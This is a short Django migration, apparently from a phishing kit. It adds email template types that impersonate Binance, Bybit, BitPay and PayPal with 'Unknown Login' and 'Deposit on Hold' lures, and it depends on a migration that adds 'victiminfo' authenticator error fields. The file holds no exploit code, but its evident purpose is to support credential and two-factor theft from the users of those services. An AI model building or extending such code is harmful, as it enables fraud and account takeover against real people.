# Generated by Django 4.2 on 2025-07-23 23:18

from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('core', '0006_victiminfo_authenticator_error_message_and_more'),
    ]

    operations = [
        migrations.AlterField(
            model_name='emailtemplate',
            name='type',
            field=models.CharField(choices=[('binance_deposit', 'Binance Deposit on Hold'), ('binance_unknown', 'Binance Unknown Login'), ('bybit_deposit', 'Bybit Deposit on Hold'), ('bybit_unknown', 'Bybit Unknown Login'), ('bitpay_deposit', 'BitPay Deposit on Hold'), ('bitpay_unknown', 'BitPay Unknown Login'), ('paypal_unknown', 'PayPal Unknown Login'), ('paypal_deposit', 'PayPal Deposit on Hold')], max_length=20),
        ),
    ]
